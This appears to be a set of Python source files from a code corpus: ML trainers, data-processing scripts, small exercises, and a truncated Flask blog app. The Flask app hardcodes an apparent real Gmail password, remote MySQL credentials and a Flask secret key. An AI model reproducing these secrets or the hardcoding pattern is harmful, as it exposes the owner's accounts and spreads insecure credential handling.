len(self.vectorizer.get_feature_names())\n\n\t\tX_train_sequences = pad_sequences(X_train_sequences, maxlen=self.MAX_SEQ_LENGHT, value=self.N_FEATURES)\n\n\t\treturn X_train_sequences\n\n\n\tdef create_model(self):\n\n\t\t# load training data\n\t\tX_train, X_test, y_train, y_test = fill_set()\n\t\t# setup preprocessing tools for embeddings\n\t\tX_train_sequences= self.sequence_setup(X_train)\n\n\t\t#Prepare model\n\t\tself.model = Sequential()\n\n\t\tself.model.add(Embedding(len(self.vectorizer.get_feature_names()) + 1, 64, input_length=self.MAX_SEQ_LENGHT))\n\t\tself.model.add(Conv1D(64, 5, activation='relu'))\n\t\tself.model.add(MaxPooling1D(5))\n\t\tself.model.add(Flatten())\n\t\tself.model.add(Dense(units=500, activation='relu', input_dim=len(self.vectorizer.get_feature_names())))\n\t\tself.model.add(Dense(units=1, activation='sigmoid'))\n\t\t\n\t\tself.model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\t\tself.model.summary()\n\n\t\tself.model.fit(X_train_sequences[:-100], y_train[:-100], epochs=3, batch_size=512, verbose=1, validation_data=(X_train_sequences[-100:], y_train[-100:]))\n\n\t\t# Test the out accuracy\n\t\tprint(\"Accuracy:\", self.get_accuracy()) \n\n\t\t# Save the model to the disk\n\t\tself.model.save(f'sentimentModel')\n\t\tprint('Sentiment Model Saved to Disk!')\n\n\n\tdef __init__(self, training= \"data/mc_training.csv\", testing=\"data/mc_testing.csv\"):\n\n\t\tif os.path.exists(\"sentimentModel/\") == False:\n\t\t\tself.create_model()\n\t\telse:\n\t\t\tX_train = fill_set(training, testing)[0]\n\t\t\tself.sequence_setup(X_train)\n\t\t\tself.model = 
load_model(\"sentimentModel/\")\n\t\t\tself.get_accuracy()\n\n\tdef format_predict( self, data):\n\t\ttemp_sequences = [to_sequence(self.tokenize, self.preprocess, self.word2idx, x) for x in data]\n\t\ttemp_sequences = pad_sequences(temp_sequences, maxlen=self.MAX_SEQ_LENGHT, value=self.N_FEATURES)\n\t\treturn temp_sequences\n\n\tdef get_accuracy(self):\n\t\tx, X_test,y, y_test = fill_set()\n\t\tX_test_sequences = self.format_predict( X_test)\n\t\tscores = self.model.evaluate(X_test_sequences, y_test, verbose=1)\n\t\tself.accuracy = scores[1]\n\t\treturn scores[1]\n\n\tdef get_results(self):\n\t\tx, X_test,y, y_test = fill_set()\n\t\tpredictions = self.model.predict(self.format_predict(X_test))\n\t\tresult= []\n\t\tfor pred in predictions:\n\t\t\tresult.append(pred[0])\n\t\treturn result\n\n\n\tdef predict(self, tests, pretty=False):\n\t\tif pretty == False:\n\t\t\treturn self.model.predict(self.format_predict(tests))\n\t\telse:\n\t\t\tpredictions = self.model.predict(self.format_predict(tests))\n\t\t\ti =0\n\t\t\t#print(len(predictions))\n\t\t\tfor pred in predictions:\n\t\t\t\tprint(tests[i] +\": \" + str(pred[0]))\n\t\t\t\ti+=1\n\n\ndef main():\n\n\tsent_tester = sentMod()\n\n\tprint(sent_tester.predict([\" I love this game, it's the best I have ever played!\" ,\"I hate this game, it's the worst I have ever played!\", \"Devil may cry\"]))\n\nif __name__ == '__main__':\n\tmain()","sub_path":"sentAnalysis.py","file_name":"sentAnalysis.py","file_ext":"py","file_size_in_byte":5288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"206636260","text":"\n# coding: utf-8\n\n# In[9]:\n\nimport re\nfrom nltk.tokenize import sent_tokenize, word_tokenize\nfrom nltk.stem.porter import PorterStemmer\nporter = PorterStemmer()\n\ndef invertindex(docs=\"docs.txt\"):\n '''This fundtion will take the document txt folder (each line should indicate new document and the first token is document name)\n It will return the inverted index and the tokenized (and stemed) version of all the documents'''\n stemmed=[]\n infile = open(docs,'r')\n docs=infile.readlines()\n docs=[i.strip() for i in docs] #removing the \\n\n docs=[i.lower() for i in docs] #Lower Case\n tokenized = [word_tokenize(docs[i]) for i in range(len(docs))]\n [i.pop(0) for i in tokenized] # Removing the ID\n for i in range(len(docs)):\n stem = [porter.stem(word) for word in tokenized[i]]\n stemmed.append(stem)\n index=dict()\n for i in range(len(stemmed)):\n for word in set(stemmed[i]):\n if word in index:\n index[word].append(i+1)\n else:\n index[word]=[i+1]\n return(index,stemmed)\n\ndef positionalintersect(p1,p2,k,invertedindex,tokenized):\n '''This function is for proximity intersection of postings lists p1 and p2. 
The function finds places where the two terms appear within k words of each other and returns a list of triples giving docID and the term position in p1 and p2.'''\n answer=list()\n shareddoc = set(invertedindex[p1]) & set(invertedindex[p2]) #Find the shared documents set\n for i in shareddoc :\n # p1index=tokenized[i-1].index(p1)\n # p2index=tokenized[i-1].index(p2) \n p1indices = [i for i, x in enumerate(tokenized[i-1]) if x == p1]\n p2indices = [i for i, x in enumerate(tokenized[i-1]) if x == p2]\n l=list()\n for pp1 in p1indices:\n for pp2 in p2indices:\n while True:\n if abs(pp1-pp2) <= k:\n l.append(pp2)\n elif pp2 > pp1:\n break\n while len(l)!=0 and abs(l[-1] - pp1) > k:\n l.pop()\n for s in l:\n answer.append((i, pp1, s))\n break\n return(answer) \n\ndef positionalintersect2(p1,p2,k,invertedindex,tokenized):\n '''This function is modified version of the positionalintersect function.\n which means given the query word1 /k word2 is will return occurrences of word1 strictly before word2, within k words.'''\n\n answer=list()\n shareddoc = set(invertedindex[p1]) & set(invertedindex[p2]) #Find the shared documents set\n for i in shareddoc :\n # p1index=tokenized[i-1].index(p1)\n # p2index=tokenized[i-1].index(p2) \n p1indices = [i for i, x in enumerate(tokenized[i-1]) if x == p1]\n p2indices = [i for i, x in enumerate(tokenized[i-1]) if x == p2]\n l=list()\n for pp1 in p1indices:\n for pp2 in p2indices:\n while True:\n if 0 < pp2-pp1 <= k:\n l.append(pp2)\n elif pp1 > pp2:\n break\n elif pp2 > pp1:\n break\n while len(l)!=0 and abs(l[-1] - pp1) > k:\n l.pop()\n for s in l:\n answer.append((i, pp1, s))\n break\n return(answer) \n\ndef querytokenizer(query):\n '''Given query with following formt: \"p1 /k p2\"\n This function will return stemed strings of p1 and p2, and k as a intiger'''\n search_token = word_tokenize(query) #Tokenize\n search_token = [i.lower() for i in search_token] # Lower Case\n search_token = [porter.stem(word) for word in search_token] #Stem\n #Extract k\n r = re.compile(\"\\/\\d+\")\n m = r.findall(query)\n k=int(m[0].replace(\"/\", \"\"))\n p1=search_token[0]\n p2=search_token[-1]\n return(p1,p2,k)\n\n\ndef submain(docs = \"docs.txt\"):\n query=input(\"Please give me the query (format: p1 /k p2)\")\n qtype=input(\"Which type of query do you want? 
(type 'a' for the directional positional intersect (part2), otherwise it will use regular positional intersect (part 1))\")\n invertedindex,tokenized =invertindex(docs)\n p1,p2,k = querytokenizer(query)\n if qtype == \"a\":\n answer=positionalintersect2(p1,p2,k,invertedindex,tokenized)\n else:\n answer=positionalintersect(p1,p2,k,invertedindex,tokenized)\n print(answer)\n return(answer)\n\ndef main():\n while True:\n submain()\n\n\nif __name__ == '__main__':\n main()","sub_path":"2/Ehsani_Sina_HW2/Ehsani_Sina_code/Ehsani_Sina_HW2.py","file_name":"Ehsani_Sina_HW2.py","file_ext":"py","file_size_in_byte":4572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"69140618","text":"import time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.keys import Keys\r\n\r\n#driver = webdriver.Chrome('C:\\\\Users\\itach\\AppData\\Local\\Programs\\Python\\Python37-32\\Lib\\site-packages\\selenium\\webdriver') # Optional argument, if not specified will search path.\r\n#driver = webdriver.Chrome('C:\\\\Webdrivers') \r\ndriver = webdriver.Chrome('C:\\\\Users\\itach\\Downloads\\chromedriver_win32 (1)\\chromedriver.exe') \r\n\r\ndriver.get('http://www.google.com/')\r\n\r\ntime.sleep(5) # Let the user actually see something!\r\n\r\nsearch_box = driver.find_element_by_name('q')\r\nsearch_box.send_keys('ChromeDriver')\r\nsearch_box.submit()\r\ntime.sleep(5) # Let the user actually see something!\r\n\r\ndriver.close()\r\n\r\n#Message: 'webdriver' executable may have wrong permissions. \r\n\r\n","sub_path":"webdriver.py","file_name":"webdriver.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"442821217","text":"import argparse\n\nimport hail\nfrom hail.expr import TDouble, TInt, TString\n\nfrom hail_scripts.v01.utils.elasticsearch_client import ElasticsearchClient\n\n\np = argparse.ArgumentParser()\np.add_argument(\"--host\", help=\"Elasticsearch host or IP\", required=True)\np.add_argument(\"--port\", help=\"Elasticsearch port\", default=9200, type=int)\np.add_argument(\"--num-shards\", help=\"Number of elasticsearch shards\", default=2, type=int)\np.add_argument(\"--block-size\", help=\"Elasticsearch block size to use when exporting\", default=1000, type=int)\nargs = p.parse_args()\n\nhc = hail.HailContext(log=\"/tmp/hail.log\")\n\ngene_results_url = \"gs://epi-browser/2018-11-07_epi25-exome-browser-gene-results-table-reduced.csv\"\n\nkt = hc.import_table(\n gene_results_url,\n delimiter=\",\",\n missing=\"NA\",\n quote='\"',\n types={\n 'gene_name': TString(),\n 'description': TString(),\n 'gene_id': TString(),\n 'xcase_lof': TInt(),\n 'xctrl_lof': TInt(),\n 'pval_lof': TDouble(),\n 'xcase_mpc': TInt(),\n 'xctrl_mpc': TInt(),\n 'pval_mpc': TDouble(),\n 'xcase_infrIndel': TInt(),\n 'xctrl_infrIndel': TInt(),\n 'pval_infrIndel': TDouble(),\n 'pval_meta': TDouble(),\n 'analysis_group': TString(),\n }\n)\n\nkt = kt.annotate('analysis_group = if (analysis_group == \"EE\") \"DEE\" else analysis_group')\n\nes = ElasticsearchClient(args.host, args.port)\n\nes.export_kt_to_elasticsearch(\n kt,\n index_name=\"epi25_gene_results_181107\",\n index_type_name=\"result\",\n block_size=args.block_size,\n num_shards=args.num_shards,\n delete_index_before_exporting=True,\n 
verbose=True,\n)\n","sub_path":"projects/exome-results-browsers/browsers/epi25/data/load_gene_results_to_es.py","file_name":"load_gene_results_to_es.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"624905194","text":"from const import COLUMN_FOR_HUAWEI_1000, PROCESSED_DATA_PATH, SUB_NAMES, RAW_DATA_PATH, HUAWEI_DATA_PATH,\\\n COLUMN_FOR_HUAWEI, FPA_TRIALS, TRUNK_SUBTRIAL_NAMES, TRIAL_NAMES, MOCAP_SAMPLE_RATE\nimport os\nimport pandas as pd\nimport xlrd\n\n\ndef initialize_path(huawei_data_path, subject_folder):\n # create folder for this subject\n fre_200_path = huawei_data_path + '\\\\' + subject_folder + '\\\\200Hz'\n fre_1000_path = huawei_data_path + '\\\\' + subject_folder + '\\\\1000Hz'\n if not os.path.exists(huawei_data_path + '\\\\' + subject_folder):\n os.makedirs(huawei_data_path + '\\\\' + subject_folder)\n if not os.path.exists(fre_200_path):\n os.makedirs(fre_200_path)\n if not os.path.exists(fre_1000_path):\n os.makedirs(fre_1000_path)\n return fre_200_path, fre_1000_path\n\n\ndef copy_200_data(trial_name):\n # copy 200 Hz data\n gait_data_200_df = pd.read_csv(ori_200_path + '\\\\' + trial_name + '.csv', index_col=False)\n gait_data_200_df_hw = gait_data_200_df[COLUMN_FOR_HUAWEI]\n data_file_str = '{folder_path}\\\\{trial_name}.csv'.format(\n folder_path=fre_200_path, trial_name=trial_name)\n gait_data_200_df_hw.to_csv(data_file_str, index=False)\n\n\ndef copy_param_data(trial_name):\n param_data_200_df = pd.read_csv(ori_200_path + '\\\\param_of_' + trial_name + '.csv', index_col=False)\n data_file_str = '{folder_path}\\\\param_of_{trial_name}.csv'.format(\n folder_path=fre_200_path, trial_name=trial_name)\n param_data_200_df.to_csv(data_file_str, index=False)\n\n\ndef copy_1000_data(trial_name):\n # copy 1000 Hz data\n gait_data_1000_df = pd.read_csv(ori_1000_path + '\\\\' + trial_name + '.csv', index_col=False)\n gait_data_1000_df_hw = gait_data_1000_df[COLUMN_FOR_HUAWEI_1000]\n data_file_str = '{folder_path}\\\\{trial_name}.csv'.format(\n folder_path=fre_1000_path, trial_name=trial_name)\n gait_data_1000_df_hw.to_csv(data_file_str, index=False)\n\n\ndef split_subtrial(trial_name, subtrials_to_keep, sensor_sampling_fre=MOCAP_SAMPLE_RATE):\n trunk_subtrial_names = TRUNK_SUBTRIAL_NAMES\n\n gait_data_200_df = pd.read_csv(ori_200_path + '\\\\' + trial_name + '.csv', index_col=False)\n param_data_200_df = pd.read_csv(ori_200_path + '\\\\param_of_' + trial_name + '.csv', index_col=False)\n gait_data_1000_df = pd.read_csv(ori_1000_path + '\\\\' + trial_name + '.csv', index_col=False)\n\n readme_sheet = xlrd.open_workbook(readme_xls).sheet_by_index(0)\n trial_id = TRIAL_NAMES.index(trial_name)\n if 'trunk' in trial_name:\n subtrial_ends = readme_sheet.row_values(trial_id + 2)[6:12]\n else:\n raise ValueError('Only split trunk trials')\n subtrial_ends = [int(element / MOCAP_SAMPLE_RATE * sensor_sampling_fre) for element in subtrial_ends]\n subtrial_duration = sensor_sampling_fre * 60\n for subtrial_id in subtrials_to_keep:\n subtrial_end = subtrial_ends[subtrial_id]\n subtrial_start = subtrial_end - subtrial_duration\n subtrial_name = trunk_subtrial_names[subtrial_id] + trial_name[-3:]\n\n gait_data_200_df_hw = gait_data_200_df[COLUMN_FOR_HUAWEI]\n gait_data_200_df_hw = gait_data_200_df_hw.iloc[subtrial_start:subtrial_end]\n data_file_str = '{folder_path}\\\\{subtrial_name}.csv'.format(\n folder_path=fre_200_path, subtrial_name=subtrial_name)\n 
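# save the cropped one-minute 200 Hz window for this subtrial\n        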
gait_data_200_df_hw.to_csv(data_file_str, index=False)\n\n        param_data_200_df_hw = param_data_200_df.iloc[subtrial_start:subtrial_end]\n        data_file_str = '{folder_path}\\\\param_of_{trial_name}.csv'.format(\n            folder_path=fre_200_path, trial_name=subtrial_name)\n        param_data_200_df_hw.to_csv(data_file_str, index=False)\n\n        gait_data_1000_df_hw = gait_data_1000_df[COLUMN_FOR_HUAWEI_1000]\n        gait_data_1000_df_hw = gait_data_1000_df_hw.iloc[subtrial_start:subtrial_end]\n        data_file_str = '{folder_path}\\\\{trial_name}.csv'.format(\n            folder_path=fre_1000_path, trial_name=subtrial_name)\n        gait_data_1000_df_hw.to_csv(data_file_str, index=False)\n\n\nfor subject_folder in SUB_NAMES:\n    print(subject_folder)\n    ori_200_path = PROCESSED_DATA_PATH + '\\\\' + subject_folder + '\\\\200Hz'\n    ori_1000_path = PROCESSED_DATA_PATH + '\\\\' + subject_folder + '\\\\1000Hz'\n    fre_200_path, fre_1000_path = initialize_path(HUAWEI_DATA_PATH, subject_folder)\n\n    readme_xls = RAW_DATA_PATH + subject_folder + '\\\\readme\\\\readme_' + subject_folder + '.xlsx'\n\n    # init static\n    copy_200_data('static')\n    copy_1000_data('static')\n    copy_200_data('static trunk')\n    copy_param_data('static trunk')\n    copy_1000_data('static trunk')\n\n    for trial_name in [TRIAL_NAMES[4], TRIAL_NAMES[7], TRIAL_NAMES[10]]:\n        split_subtrial(trial_name, [0, 2, 4])\n\n    # init FPA trials\n    for trial_name in FPA_TRIALS:\n        copy_200_data(trial_name)\n        copy_param_data(trial_name)\n        copy_1000_data(trial_name)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"0_preprocessing/data_for_huawei.py","file_name":"data_for_huawei.py","file_ext":"py","file_size_in_byte":4885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"371833464","text":"class Solution(object):\n    def grayCode(self, n):\n        \"\"\"\n        :type n: int\n        :rtype: List[int]\n        \"\"\"\n        if n == 0:\n            return [0]\n\n        if n == 1:\n            return [0, 1]\n\n        res = [0, 1]\n\n        for i in range(1, n):\n            length = len(res) # length of the current list\n            for j in range(length):\n                res.append(length + res[length - j - 1])\n\n        return res\n\n\n\n\nif __name__ == '__main__':\n    n = 3\n    res = Solution().grayCode(n)\n    print(res)","sub_path":"leetcode/51-100/_89_grayCode.py","file_name":"_89_grayCode.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"70900728","text":"'''\r\nthis is the trainer of the 'Future Frame Prediction for Anomaly Detection - A New Baseline CVPR2018'\r\n'''\r\n#!!!!! 
ignore the warning messages\r\nimport warnings\r\nwarnings.filterwarnings('ignore')\r\nimport os\r\nimport pickle\r\nimport math\r\nimport torch\r\nimport time\r\nimport numpy as np\r\nfrom PIL import Image\r\nfrom collections import OrderedDict\r\nfrom torch.utils.data import DataLoader\r\nimport torchvision.transforms as T\r\nimport torchvision.transforms.functional as tf\r\n\r\nfrom pyanomaly.core.engine.default_engine import DefaultTrainer, DefaultInference\r\nfrom pyanomaly.core.utils import AverageMeter, multi_obj_grid_crop, frame_gradient, get_batch_dets, tensorboard_vis_images, ParamSet, make_info_message\r\nfrom pyanomaly.datatools.evaluate.utils import psnr_error\r\n\r\ntry:\r\n    from sklearn.externals import joblib\r\nexcept:\r\n    import joblib\r\n\r\nclass Trainer(DefaultTrainer):\r\n    NAME = [\"OCAE.TRAIN\"]\r\n    def custom_setup(self):\r\n        # basic things\r\n        if self.kwargs['parallel']:\r\n            self.A = self.data_parallel(self.model['A'])\r\n            self.B = self.data_parallel(self.model['B'])\r\n            self.C = self.data_parallel(self.model['C'])\r\n            self.Detector = self.data_parallel(self.model['Detector'])\r\n        else:\r\n            self.A = self.model['A'].cuda()\r\n            self.B = self.model['B'].cuda()\r\n            self.C = self.model['C'].cuda()\r\n            self.Detector = self.model['Detector'].cuda()\r\n        \r\n        self.ovr_model = self.model['OVR']\r\n\r\n        # get the optimizer\r\n        self.optim_ABC = self.optimizer['optimizer_abc']\r\n\r\n        # get the loss function\r\n        self.a_loss = self.loss_function['A_loss']\r\n        self.b_loss = self.loss_function['B_loss']\r\n        self.c_loss = self.loss_function['C_loss']\r\n\r\n        # the lr scheduler\r\n        self.lr_abc = self.lr_scheduler_dict['optimizer_abc_scheduler']\r\n\r\n        # basic meter\r\n        self.loss_meter_ABC = AverageMeter(name='loss_ABC')\r\n\r\n        self.test_dataset_keys = self.kwargs['test_dataset_keys']\r\n        self.test_dataset_dict = self.kwargs['test_dataset_dict']\r\n\r\n        self.cluster_dataset_keys = self.kwargs['cluster_dataset_keys']\r\n        self.cluster_dataset_dict = self.kwargs['cluster_dataset_dict']\r\n\r\n        self.ovr_model_path = os.path.join(self.config.TRAIN.model_output, f'ocae_cfg@{self.config_name}#{self.verbose}.npy') \r\n\r\n    \r\n    def train(self,current_step):\r\n        # Pytorch [N, C, D, H, W]\r\n        # initialize\r\n        start = time.time()\r\n        self.set_requires_grad(self.A, True)\r\n        self.set_requires_grad(self.B, True)\r\n        self.set_requires_grad(self.C, True)\r\n        self.set_requires_grad(self.Detector, False)\r\n        self.A.train()\r\n        self.B.train()\r\n        self.C.train()\r\n        self.Detector.eval()\r\n        writer = self.kwargs['writer_dict']['writer']\r\n        global_steps = self.kwargs['writer_dict']['global_steps_{}'.format(self.kwargs['model_type'])]\r\n\r\n        # get the data\r\n        data, _ = next(self._train_loader_iter) # the core for dataloader\r\n        self.data_time.update(time.time() - start)\r\n        \r\n        # based on D, get each frame\r\n        # in this method, D = 3 and does not change\r\n        future = data[:, :, -1, :, :].cuda() # t+1 frame \r\n        current = data[:, :, 1, :, :].cuda() # t frame\r\n        past = data[:, :, 0, :, :].cuda() # t-1 frame\r\n\r\n        bboxs = get_batch_dets(self.Detector, current)\r\n        # this method is based on the objects to train the model instead of frames\r\n        for index, bbox in enumerate(bboxs):\r\n            if bbox.numel() == 0:\r\n                bbox = bbox.new_zeros([1, 4])\r\n            # get the crop objects\r\n            input_currentObject_B, _ = multi_obj_grid_crop(current[index], bbox)\r\n            future_object, _ = multi_obj_grid_crop(future[index], bbox)\r\n            # future2current = torch.stack([future_object, input_currentObject_B], dim=1)\r\n            current2future = 
torch.stack([input_currentObject_B, future_object], dim=1)\r\n past_object, _ = multi_obj_grid_crop(past[index], bbox)\r\n # current2past = torch.stack([input_currentObject_B, past_object], dim=1)\r\n past2current = torch.stack([past_object, input_currentObject_B], dim=1)\r\n\r\n _, _, input_objectGradient_A = frame_gradient(current2future)\r\n input_objectGradient_A = input_objectGradient_A.sum(1)\r\n _, _, input_objectGradient_C = frame_gradient(past2current)\r\n input_objectGradient_C = input_objectGradient_C.sum(1)\r\n # import ipdb; ipdb.set_trace()\r\n # True Process =================Start===================\r\n # original_A = (0.3 * input_objectGradient_A[:,0] + 0.59 * input_objectGradient_A[:,1] + 0.11 * input_objectGradient_A[:,2]).unsqueeze(1)\r\n # original_B = (0.3 * input_currentObject_B[:,0] + 0.59 * input_currentObject_B[:,1] + 0.11 * input_currentObject_B[:,2]).unsqueeze(1)\r\n # original_C = (0.3 * input_objectGradient_C[:,0] + 0.59 * input_objectGradient_C[:,1] + 0.11 * input_objectGradient_C[:,2]).unsqueeze(1)\r\n _, output_recGradient_A, original_A = self.A(input_objectGradient_A)\r\n _, output_recObject_B, original_B = self.B(input_currentObject_B)\r\n _, output_recGradient_C, original_C = self.C(input_objectGradient_C)\r\n # import ipdb; ipdb.set_trace()\r\n # loss_A = self.a_loss(output_recGradient_A, input_objectGradient_A)\r\n # loss_B = self.b_loss(output_recObject_B, input_currentObject_B)\r\n # loss_C = self.c_loss(output_recGradient_C, input_objectGradient_C)\r\n loss_A = self.a_loss(output_recGradient_A, original_A)\r\n loss_B = self.b_loss(output_recObject_B, original_B)\r\n loss_C = self.c_loss(output_recGradient_C, original_C)\r\n\r\n loss_all = self.loss_lamada['A_loss'] * loss_A + self.loss_lamada['B_loss'] * loss_B + self.loss_lamada['C_loss'] * loss_C\r\n self.optim_ABC.zero_grad()\r\n loss_all.backward()\r\n self.optim_ABC.step()\r\n # record\r\n self.loss_meter_ABC.update(loss_all.detach())\r\n if self.config.TRAIN.general.scheduler.use:\r\n self.lr_abc.step()\r\n \r\n # ======================End==================\r\n\r\n self.batch_time.update(time.time() - start)\r\n\r\n if (current_step % self.steps.param['log'] == 0):\r\n msg = make_info_message(current_step, self.steps.param['max'], self.kwargs['model_type'], self.batch_time, self.config.TRAIN.batch_size, self.data_time, [self.loss_meter_ABC])\r\n self.logger.info(msg)\r\n writer.add_scalar('Train_loss_ABC', self.loss_meter_ABC.val, global_steps)\r\n\r\n if (current_step % self.steps.param['vis'] == 0):\r\n vis_objects = OrderedDict({\r\n 'train_input_objectGradient_A': input_objectGradient_A.detach(),\r\n 'train_input_currentObject_B': input_currentObject_B.detach(),\r\n 'train_input_objectGradient_C': input_objectGradient_C.detach(),\r\n 'train_output_recGradient_A': output_recGradient_A.detach(),\r\n 'train_output_recObject_B': output_recObject_B.detach(),\r\n 'train_output_recGradient_C': output_recGradient_C.detach()\r\n })\r\n tensorboard_vis_images(vis_objects, writer, global_steps, self.normalize.param['train'])\r\n global_steps += 1 \r\n # reset start\r\n start = time.time()\r\n \r\n self.saved_model = {'A':self.A, 'B':self.B, 'C':self.C}\r\n self.saved_optimizer = {'optim_ABC': self.optim_ABC}\r\n self.saved_loss = {'loss_ABC':self.loss_meter_ABC.val}\r\n self.kwargs['writer_dict']['global_steps_{}'.format(self.kwargs['model_type'])] = global_steps\r\n \r\n def mini_eval(self, current_step):\r\n if current_step % self.steps.param['mini_eval'] != 0:\r\n return\r\n temp_meter_A = 
AverageMeter()\r\n        temp_meter_B = AverageMeter()\r\n        temp_meter_C = AverageMeter()\r\n        \r\n        self.set_requires_grad(self.A, False)\r\n        self.set_requires_grad(self.B, False)\r\n        self.set_requires_grad(self.C, False)\r\n        self.set_requires_grad(self.Detector, False)\r\n        self.A.eval()\r\n        self.B.eval()\r\n        self.C.eval()\r\n        self.Detector.eval()\r\n\r\n        for data, _ in self.val_dataloader:\r\n            # based on D, get each frame\r\n            # in this method, D = 3 and does not change\r\n            future_mini = data[:, :, -1, :, :].cuda() # t+1 frame \r\n            current_mini = data[:, :, 1, :, :].cuda() # t frame\r\n            past_mini = data[:, :, 0, :, :].cuda() # t-1 frame\r\n\r\n            bboxs_mini = get_batch_dets(self.Detector, current_mini)\r\n\r\n            for index, bbox in enumerate(bboxs_mini):\r\n                if bbox.numel() == 0:\r\n                    bbox = bbox.new_zeros([1, 4])\r\n                # get the crop objects\r\n                input_currentObject_B, _ = multi_obj_grid_crop(current_mini[index], bbox)\r\n                future_object, _ = multi_obj_grid_crop(future_mini[index], bbox)\r\n                future2current = torch.stack([future_object, input_currentObject_B], dim=1)\r\n                past_object, _ = multi_obj_grid_crop(past_mini[index], bbox)\r\n                current2past = torch.stack([input_currentObject_B, past_object], dim=1)\r\n\r\n                _, _, input_objectGradient_A = frame_gradient(future2current)\r\n                input_objectGradient_A = input_objectGradient_A.sum(1)\r\n                _, _, input_objectGradient_C = frame_gradient(current2past)\r\n                input_objectGradient_C = input_objectGradient_C.sum(1)\r\n                \r\n                _, output_recGradient_A, _ = self.A(input_objectGradient_A)\r\n                _, output_recObject_B, _ = self.B(input_currentObject_B)\r\n                _, output_recGradient_C, _ = self.C(input_objectGradient_C)\r\n\r\n                psnr_A = psnr_error(output_recGradient_A.detach(), input_objectGradient_A)\r\n                psnr_B = psnr_error(output_recObject_B.detach(), input_currentObject_B)\r\n                psnr_C = psnr_error(output_recGradient_C.detach(), input_objectGradient_C)\r\n                temp_meter_A.update(psnr_A.detach())\r\n                temp_meter_B.update(psnr_B.detach())\r\n                temp_meter_C.update(psnr_C.detach())\r\n\r\n        self.logger.info(f'&^*_*^& ==> Step:{current_step}/{self.steps.param[\"max\"]} the A PSNR is {temp_meter_A.avg:.2f}, the B PSNR is {temp_meter_B.avg:.2f}, the C PSNR is {temp_meter_C.avg:.2f}')\r\n\r\n\r\nclass Inference(DefaultInference):\r\n    NAME = [\"OCAE.INFERENCE\"]\r\n    def custom_setup(self):\r\n        # load_state_dict() returns a status object rather than the module itself,\r\n        # so load the weights first and then wrap/move the models\r\n        self.model['A'].load_state_dict(self.save_model['A'])\r\n        self.model['B'].load_state_dict(self.save_model['B'])\r\n        self.model['C'].load_state_dict(self.save_model['C'])\r\n        if self.kwargs['parallel']:\r\n            self.A = self.data_parallel(self.model['A'])\r\n            self.B = self.data_parallel(self.model['B'])\r\n            self.C = self.data_parallel(self.model['C'])\r\n            self.Detector = self.data_parallel(self.model['Detector'])\r\n        else:\r\n            self.A = self.model['A'].cuda()\r\n            self.B = self.model['B'].cuda()\r\n            self.C = self.model['C'].cuda()\r\n            self.Detector = self.model['Detector'].cuda()\r\n        \r\n        self.ovr_model_path = os.path.join(self.config.TRAIN.model_output, f'ocae_cfg@{self.config_name}#{self.verbose}.npy')\r\n        self.ovr_model = self.model['OVR']\r\n        self.ovr_model = joblib.load(self.ovr_model_path)\r\n\r\n        self.test_dataset_keys = self.kwargs['test_dataset_keys']\r\n        self.test_dataset_dict = self.kwargs['test_dataset_dict']\r\n\r\n    def inference(self):\r\n        for h in self._hooks:\r\n            h.inference()\r\n    
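# NOTE: the NAME lists above presumably key Trainer/Inference into the engine registry; the actual inference work is delegated to the registered hooks.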
","sub_path":"pyanomaly/core/ocae.py","file_name":"ocae.py","file_ext":"py","file_size_in_byte":11908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"139732064","text":"from flask import Flask, render_template, request, session,redirect\nfrom werkzeug.utils import secure_filename\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_mail import Mail\nimport os\nfrom datetime import datetime\nimport math\n\nlocal_host = False\nmailn = 'yashmahajan1142@gmail.com'\n\napp = Flask(__name__)\n\nmailgun_secret_key_value = os.environ.get('MAILGUN_SECRET_KEY', None)\nport = int(os.environ.get(\"PORT\", 5001))\n\napp.secret_key = 'super-secret-key'\napp.config['uploader'] = \"E:\\\\flask\\\\static\\\\img\"\napp.config.update(\n MAIL_SERVER = 'smtp.gmail.com',\n MAIL_USE_TLS = 'True',\n MAIL_PORT = '587',\n MAIL_USERNAME = 'yashmahajan1142@gmail.com',\n MAIL_PASSWORD = 'Mahajan2001'\n)\nmail = Mail(app)\nif local_host==True:\n app.config['SQLALCHEMY_DATABASE_URI'] = \"mysql+pymysql://root:@localhost/team rahi\"\nelse:\n app.config['SQLALCHEMY_DATABASE_URI'] = \"mysql+pymysql://KTzygVZtCD:ZaWGvTyHxA@remotemysql.com/KTzygVZtCD\"\n\ndb = SQLAlchemy(app)\n\n\nclass Contents(db.Model):\n\n sno = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(80), nullable=False)\n phno = db.Column(db.String(12), nullable=False)\n date = db.Column(db.String(12),nullable=True)\n email = db.Column(db.String(20), nullable=False)\n\n\nclass Blogs(db.Model):\n number = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(80), nullable=False)\n tag_line = db.Column(db.String(80), nullable=False)\n slug = db.Column(db.String(12), nullable=False)\n content = db.Column(db.String(12), nullable=True)\n date = db.Column(db.String(20), nullable=False)\n by = db.Column(db.String(20), nullable=False)\n img_file = db.Column(db.String(20), nullable=False)\n\n@app.route(\"/\")\ndef home():\n posts = Blogs.query.filter_by().all()\n last = math.ceil(len(posts)/4)\n page = request.args.get(\"page\")\n if not str(page).isnumeric():\n page = 1\n\n page = int(page)\n if page==last:\n posts = posts[0:0+last]\n else:\n posts = posts[(len(posts)-4*(page-1))-4:len(posts)-4*(page-1)]\n if page==1:\n befor = \"#\"\n next = \"/?page=\"+ str(page+1)\n\n elif page==last:\n befor = \"/?page=\" + str(page - 1)\n next = \"#\"\n\n else:\n befor = 